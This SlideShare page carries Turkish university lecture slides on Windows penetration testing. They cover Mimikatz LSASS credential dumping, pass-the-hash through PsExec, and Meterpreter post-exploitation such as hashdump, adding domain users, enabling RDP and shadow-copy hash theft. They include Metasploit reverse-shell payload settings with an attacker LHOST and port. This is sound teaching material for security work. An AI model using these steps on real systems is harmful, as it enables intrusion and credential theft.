Ferhat Ozgur Catak, profile picture
Uploaded byFerhat Ozgur Catak
560 views

Windows Hacking 2

Windows Hacking 2

Software
Related topics:
Penetration-Testing

Embed presentation

Downloaded 32 times
Ke¸sif (Devam) Exploitation Post-Exploit Windows Hacking - II BGM 554 - Sızma Testleri ve G¨uvenlik Denetlemeleri-II Bilgi G¨uvenli˘gi M¨uhendisli˘gi Y¨uksek Lisans Programı Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr ˙Istanbul S¸ehir ¨Universitesi 2016/2017 - Bahar Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo I Mimikatz Windows i¸sletim sisteminde oturum a¸cıldı˘gında kullanıcı ad/parola memory’de saklanır. Bir bilgisayara active directory hesabı kullanılarak oturum a¸cıldı˘gında parola yine memory ¨uzerinde olacaktır. Bu zafiyet kullanılarak LSA prosesi exploit edilir. Mimikatz aracı kullanılarak LSASS (Local Security Authority Process) prosesi dump edilerek olu¸sturulan dosyayı a¸cılabilmektedir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo IV Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo V Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares Mimikatz Demo VI Mimikatz Genellikle bir betik kullanılarak bu s¨ureci otomatize edebilmektedirler. Procdump 1 ftp veya benzeri bir y¨ontemle dosyanın dı¸sarı aktarılması ve eri¸sim sa˘glama y¨ontemi Mimikatz2 sadece oturum a¸cmı¸s kullanıcıları de˘gil aynı zamanda daha ¨once oturum a¸cmı¸s kullanıcılara ait bilgilerede eri¸sebilmektedir. Mimikatz terminal sunucu ¨uzerinde ¸calı¸stırılması durumunda sunucuyu kullanmı¸s b¨ut¨un kullanıcılar hakkında bilgi edinilebilir. 1 https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx 2 https://github.com/gentilkiwi/mimikatz/releases Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares smb enumshares I Administrative Shares Sistem y¨oneticilerinin bir a˘ga ba˘glı sistemdeki her disk birimine uzaktan eri¸smesine olanak tanıyan Windows NT i¸sletim sistemi ailesi tarafından olu¸sturulan gizli a˘g payla¸sımlarıdır. Disk volumes: Sistemdeki her disk birimi, administrative share olarak payla¸stırılır. C, D ve E birimlerinin bulundu˘gu bir sistem, C$, D$ veya E$ adlı ¨u¸c payla¸sıma sahiptir. OS folder: Windows’un y¨ukl¨u oldu˘gu klas¨or admin$ Fax cache: Fakslanan sayfaların ve kapak sayfalarının ¨onbelle˘ge alındı˘gı klas¨or, fax$ IPC shares: inter-process communication ipc$ Printers folder: Y¨ukl¨u yazıcıları temsil eden nesneyi i¸ceren sanal klas¨or, print$ Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Mimikatz Demo smb enumshares smb enumshares II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Giri¸s I Giri¸s Ke¸sif a¸samasında ve i¸c a˘g testleri sırasında elde edilen bilgiler do˘grultusunda sistemlere eri¸sim sa˘glanması Kullanılan y¨ontemler Sistemlerde bulunan zafiyetler Yerel y¨onetici hesapları Pass the hash(Psexec vb.) Kaba kuvvet saldırıları ˙I¸c a˘g testlerinde elde edilen kullanıcı bilgileri i¸ceren dosyalar Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Pass the Hash Pass the Hash G¨u¸cl¨u bir parola politikası oldu˘gu durumlarda NTLM ¸sifre ¨ozetlerinin kırılması uzun s¨ureler alabilmektedir. Bu durumlara kar¸sı ¨ozellikle Windows sistemlerde ¸sifre ¨ozetleri kullanılarak sistemlere eri¸sim sa˘glanabilmektedir. Pass the Hash y¨ontemi Windows sistemlerde dosya, yazıcı payla¸sımları gibi bilgisayar kaynaklarının payla¸sılmasını sa˘glayan Server Message Block (SMB) protokol¨un¨u kullanır. Pass the Hash y¨onteminin ¸calı¸sması i¸cin hedef bilgisayarda y¨onetimsel payla¸sımların ya da y¨onetici hakkıyla a¸cılmı¸s ba¸ska payla¸sımların bulunması gerekmektedir. Pass the Hash y¨ontemini kullanarak hedef bilgisayarlara eri¸sim sa˘glayan ara¸clardan birisi PsExec’tir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit I PsExec - Metasploit Metasploit PsExec aracının hedef bilgisayar ¨uzerinde oturum a¸cabilmesi i¸cin gerekli bilgiler ¸sunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola ¨ozeti Y¨onetimsel payla¸sım Hedef bilgisayar ¨uzerinde Pass the Hash y¨ontemini engellemek i¸cin herhangi bir g¨uvenlik politikası uygulanmamı¸ssa, yukarıdaki bilgiler do˘grultusunda y¨uksek seviyeli haklarla a¸cılan bir meterpreter oturumu elde edilibilir. PsExec aracının oturum a¸cabilmesi i¸cin araca verilen kullanıcının hedef bilgisayar ¨uzerinde y¨onetimsel payla¸sımlar ¨uzerinde hak sahibi olması gerekmektedir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit II Parametreler RHOST: Hedef bilgisayara ait IP bilgisi RPORT: Hedef bilgisayar ¨uzerinde SMB protokol¨un¨un ¸calı¸stı˘gı port SHARE: Hedef bilgisayarda kullanılacak y¨onetimsel payla¸sım SMBDomain: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcı hesabının ¨uye oldu˘gu etki alanı (Workgroup – Etki alanı) SMBUser: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcı SMBPass: Hedef bilgisayar ¨uzerinde yetkili olan kullanıcıya ait parola ya da ¸sifre ¨ozeti set payload windows/meterpreter/reverse tcp set LHOST 192.168.4.33 set LPORT 443 Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit IV Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec - Metasploit V Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec I Sysinternals PsExec Sysinternals PsExec 3 aracının hedef bilgisayar ¨uzerinde oturum a¸cabilmesi i¸cin gerekli bilgiler ¸sunlardır: Hedef bilgisayara ait IP adresi Kullanıcı adı Parola Y¨onetimsel payla¸sım Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec II 3 https://technet.microsoft.com/tr-tr/sysinternals/bb897553.aspx Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec + Wce I PsExec + Wce Wce4 S¸ifre ¨ozetinin kullanılarak PsExec’in ¸calı¸stırılması Hedef bilgisayara ait kullanıcı adı ve ¸sifre ¨ozeti bilgisi hedef bilgisayarın IP adresi ile birlikte PsExec aracının ¸calı¸stırılaca˘gı bilgisayarın belle˘gine y¨uklenmektedir. PsExec aracına herhangi bir kullanıcı bilgisi ve ¸sifre ¨ozeti bilgisi verilmeden hedef bilgisayar ¨uzerinde komut satırı eri¸simi elde edilir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları Sysinternals PsExec + Wce II 4 http://www.ampliasecurity.com/research/windows-credentials-editor/ Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları PsExec Sınırlandırmaları I Y¨onetimsel payla¸sımların kapalı olması AutoShareWks => 0 HKEY LOCAL MACHINESYSTEMCurrentControlSet Services LanmanServerParametersAutoShareWks AutoShareServer => 0 HKEY LOCAL MACHINESYSTEMCurrentControlSet ServicesLanmanServerParametersAutoShareServer Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin ˙I¸cindekiler 1 Ke¸sif (Devam) Mimikatz Demo smb enumshares 2 Exploitation Giri¸s Pass the Hash PsExec - Metasploit Sysinternals PsExec PsExec Sınırlandırmaları 3 Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Post-Exploit I Sistemlere sızıldıktan sonra ger¸cekle¸stirilen i¸slemler Meterpreter ¨uzerinde yapılan i¸slemler Parola ¨ozetleri elde etme Parola ¨ozetlerini kırma Etki alanına yetkili kullanıcı ekleme Bellekten parola alma Envanter, ba˘glantı bilgisi vb. bilgiler i¸ceren dosyaları arama Sunucu yedekleri tespit etme Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Post-Exploit II Post-exploitation sonrası elde edilen bilgiler Kullanıcı adı ve parola bilgileri S¸ifre ¨ozetleri Etki alanında yetkili kullanıcı Sistemler hakkında detaylı bilgi Sunucu yedekleri Etki alanı kullanıcıları ve ¸sifre ¨ozetleri Veritabanı ba˘glantı bilgileri Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter I Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter II Meterpreter Stdapi, Priv ve Core meterpreter oturumu a¸cıldı˘gında otomatik olarak y¨uklenmektedir. Y¨ukl¨u olmayan eklentileri kullanabilmek i¸cin “load eklenti adı” ¸calı¸stırılmalıdır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Core komutları Core Komutları Background: Aktif olan meterpreter oturumunu arka plana alarak, metasploit ekranına d¨on¨ulmesini sa˘glar. Session –i komutu ile tekrar ilgili meterpreter oturumuna geri d¨on¨ul¨ur. Migrate: Farklı bir kullanıcının ¸calı¸stırdı˘gı s¨urecin elde edilmesini ve o kullanıcının haklarının kullanılmasını sa˘glar. S¸u an ¸calı¸san s¨urecin hakkından daha y¨uksek haklı bir s¨urece ge¸ci¸s yapılamaz. Exit: Aktif olan meterpreter oturumunu sonlandırır. Run: Meterpreter oturumu ¨uzerinde post mod¨uller ya da script ¸calı¸stırmak i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları I Stdapi Komutları Meterpreter oturumunda en ¸cok kullanılan komutların bulundu˘gu eklentidir. ¨U¸c alt ba¸slı˘ga sahiptir: Dosya sistemi Sistem Kullanıcı aray¨uz¨u. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları II 1. File System Komutları cd/lcd: Dosya sistemleri ¨uzerinde dola¸sma i¸cin kullanılır. l (local) harfi i¸slemin metasploit aracının kurulu oldu˘gu bilgisayardaki dosya sisteminde ger¸cekle¸sti˘gini belirtir. upload/download: Hedef bilgisayara dosya y¨ukleme ve hedef bilgisayardan dosya indirmek i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları III 2. System Komutları getpid/getuid: Meterpreter oturumunun hangi kullanıcı ile a¸cıldı˘gını g¨osterir. shell: Hedef bilgisayar ¨uzerinde komut satırı eri¸simi sa˘glar. sysinfo: Hedef bilgisayar hakkında bilgi verir. ps: Hedef bilgisayarda ¸calı¸san s¨ure¸cleri ve s¨ure¸clerle ilgili bilgileri g¨osterir. kill: Hedef bilgisayar ¨uzerinde ¸calı¸san s¨ure¸cleri ¨old¨urmek i¸cin kullanılır. reg: Hedef bilgisayardaki kayıt defterini y¨onetmek i¸cin kullanılır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Stdapi Komutları IV 3. User Interface idletime: Hedef bilgisayarda oturum a¸cmı¸s kullanıcının i¸slem yapmadı˘gı s¨ureyi belirtir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri I Priv ve Incognito Eklentileri Priv: hedef bilgisayar ¨uzerinde hak y¨ukseltmek Incognito: etki alanında hak y¨ukseltmek ve y¨onetici olmak Priv komutları Getsystem: SYSTEM haklarını elde etmek i¸cin kullanılır. Bilgisayardaki bazı g¨uvenlik maddelerine ba˘glı olarak bazen ¸calı¸smayabilmektedir. Hashdump: Hedef bilgisayarda bulunan yerel kullanıcı ¸sifre ¨ozetlerini elde eder. C¸alı¸smayabilir. Alternatif olarak hashdump post mod¨ul¨u kullanılabilir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri II Incognito komutları Add user: Hedef bilgisayara ya da etki alanına kullanıcı ekler. Add group user: Hedef bilgisayardaki ya da etki alanındaki gruplara kullanıcı ekler. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Priv ve Incognito Eklentileri III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Mimikatz Eklentisi I Mimikatz Mimikatz: Windows sistemlerde bellekte saklanan parolaları elde etmek i¸cin kullanılmaktadır. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Mimikatz Eklentisi II Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri I Meterpreter Post Post mod¨uller: bilgi toplamak ve ¸ce¸sitli i¸slemler ger¸cekle¸stirmektedir Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri II enum termserv Post Modul¨u Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri III Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri IV hashdump Post Modul¨u Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri V enable rdp Post Modul¨u Bilgisayara uzak masa¨ust¨u oturumu a¸cılmasına izin veren de˘geri de˘gi¸stirir (fDenyTSConnections 1 => Uzak masa¨ust¨u oturumuna izin verme). Uzak masa¨ust¨u servisinin ba¸slatma durumu “Devre Dı¸sı (Disabled)” ise, “Otomatik (Automatic)” olarak de˘gi¸stirir. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri VI Uzak masa¨ust¨u servisini ba¸slatır. G¨uvenlik duvarında uzak masa¨ust¨u servisinin kullandı˘gı portu a¸car (Gerekli oldu˘gu durumlarda). Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Vssadmin komutu I Vssadmin G¨olge Kopyalardan S¸ifre ¨Ozeti Alma Dosyaların eski versiyonlarına geri d¨on¨u¸s yapabilmeyi sa˘glayan Windows i¸sletim sisteminin bir ¨ozelli˘gi Vssadmin 5 Current volume shadow copy backups All installed shadow copy writers and providers. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları Stdapi Komutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Vssadmin komutu II 5 https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II

More Related Content

PPTX
BTRisk Adli Bilişim Eğitimi Sunumu
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PDF
Puppet ile Linux Sistem Yönetimi Otomasyonu
byBilgiO A.S / Linux Akademi
 
PPT
Linux101 Temel Komutlar-Dizin Yapısı
bySDU CYBERLAB
 
PDF
Sızma Testi ve Güvenlik Denetlemeleri - Temel Linux Bilgisi
byFerhat Ozgur Catak
 
PDF
Unix Denetim Dokümanı
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
PPTX
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
byBGA Cyber Security
 
PDF
Veritabanı Sızma Testleri - Keşif
byFerhat Ozgur Catak
 
PDF
Linux101
byMURAT ARSLAN
 
BTRisk Adli Bilişim Eğitimi Sunumu
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Puppet ile Linux Sistem Yönetimi Otomasyonu
byBilgiO A.S / Linux Akademi
 
Linux101 Temel Komutlar-Dizin Yapısı
bySDU CYBERLAB
 
Sızma Testi ve Güvenlik Denetlemeleri - Temel Linux Bilgisi
byFerhat Ozgur Catak
 
Unix Denetim Dokümanı
byBTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
ISTSEC 2013 - Fuzzy Tabanlı Zaafiyet Araştırması
byBGA Cyber Security
 
Veritabanı Sızma Testleri - Keşif
byFerhat Ozgur Catak
 
Linux101
byMURAT ARSLAN
 

What's hot

PDF
Metasploit El Kitabı
byBGA Cyber Security
 
ODP
Bilgi Sistemleri Güvenliği Metasploit
bymsoner
 
PDF
Ossec - Host Based Saldırı Tespit Sistemi
byBilgiO A.S / Linux Akademi
 
PDF
Temel Linux Kullanımı ve Komutları
byAhmet Gürel
 
PPTX
Cuneyd Uzun - Advanced Persistent Threat 29 Cosy Bear
byCüneyd Uzun
 
PPTX
Linux 101
byMehmet Gürol Çay
 
PDF
W3af ile Web Uygulama Güvenlik Testleri – II
byBGA Cyber Security
 
DOCX
Hacking'in Mavi Tarafı -2
byTurkhackteam Blue Team
 
PDF
Siber Güvenlik ve Etik Hacking Sunu - 10
byMurat KARA
 
DOCX
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
byBGA Cyber Security
 
PDF
Kesif ve Zafiyet Tarama
byFerhat Ozgur Catak
 
DOCX
SIZMA TESTLERİNDE BİLGİ TOPLAMA
byBGA Cyber Security
 
DOCX
VERİTABANI SIZMA TESTLERİ
byBGA Cyber Security
 
DOCX
Hacking'in Mavi Tarafı -1
byTurkhackteam Blue Team
 
PPT
Biricikoglu Islsisguv Sunum
byeroglu
 
PDF
Holynix v1
byBGA Cyber Security
 
PDF
Ozgur Yazilimlar ile Saldiri Yontemleri
byFatih Ozavci
 
PDF
Apache Htaccess Güvenlik Testleri
byBGA Cyber Security
 
PPTX
Linux Kullanım Rehberi
byMert Can ALICI
 
PDF
Veritabanı Sızma Testleri - Hafta 3
byFerhat Ozgur Catak
 
Metasploit El Kitabı
byBGA Cyber Security
 
Bilgi Sistemleri Güvenliği Metasploit
bymsoner
 
Ossec - Host Based Saldırı Tespit Sistemi
byBilgiO A.S / Linux Akademi
 
Temel Linux Kullanımı ve Komutları
byAhmet Gürel
 
Cuneyd Uzun - Advanced Persistent Threat 29 Cosy Bear
byCüneyd Uzun
 
Linux 101
byMehmet Gürol Çay
 
W3af ile Web Uygulama Güvenlik Testleri – II
byBGA Cyber Security
 
Hacking'in Mavi Tarafı -2
byTurkhackteam Blue Team
 
Siber Güvenlik ve Etik Hacking Sunu - 10
byMurat KARA
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
byBGA Cyber Security
 
Kesif ve Zafiyet Tarama
byFerhat Ozgur Catak
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
byBGA Cyber Security
 
VERİTABANI SIZMA TESTLERİ
byBGA Cyber Security
 
Hacking'in Mavi Tarafı -1
byTurkhackteam Blue Team
 
Biricikoglu Islsisguv Sunum
byeroglu
 
Holynix v1
byBGA Cyber Security
 
Ozgur Yazilimlar ile Saldiri Yontemleri
byFatih Ozavci
 
Apache Htaccess Güvenlik Testleri
byBGA Cyber Security
 
Linux Kullanım Rehberi
byMert Can ALICI
 
Veritabanı Sızma Testleri - Hafta 3
byFerhat Ozgur Catak
 

Similar to Windows Hacking 2

PDF
Siber Güvenlik ve Etik Hacking Ders Sunusu (Güncelleme - 2025)
byMurat KARA
 
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
byPRISMA CSI
 
PDF
Siber Guvenlik ve Etik Hhacking -2-
byMurat KARA
 
PPTX
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
